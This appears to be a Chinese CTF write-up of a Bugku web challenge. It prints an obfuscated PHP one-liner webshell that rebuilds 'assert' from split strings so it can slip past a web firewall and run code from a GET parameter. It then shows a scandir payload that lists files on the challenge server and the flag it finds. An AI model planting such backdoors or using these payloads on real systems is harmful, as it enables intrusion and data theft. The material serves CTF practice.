过狗一句话
过狗一句话
100
送给大家一个过狗一句话 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>
1.代码审计
访问网站发现无内容
开始分析所给的代码
<?php
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>
代码审计发现$poc_2($_GET['s'])
可能存在代码执行漏洞,或者后门
2.构造漏洞
使用菜刀进行连接,发现没用
php中读取目录下文件的方法:
最简单的是print_r(scandir($dir)),还可以利用print_r(glob("."))
scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组
show_source() //显示文件源码
highlight_file() //和show_source()函数是一个意思
构造代码 `http://123.206.87.240:8010/index.php?s=print_r(scandir(%27./%27))
Array ( [0] => . [1] => .. [2] => c.php [3] => flag_sm1skla1.txt [4] => index.php [5] => info.php [6] => test3 [7] => zaq.php [8] => zzz.php [9] => zzz1.php )
- 发现关键字
flag_sm1skla1.txt
网站进行访问,找到flag
BUGKU{bugku_web_009801_a}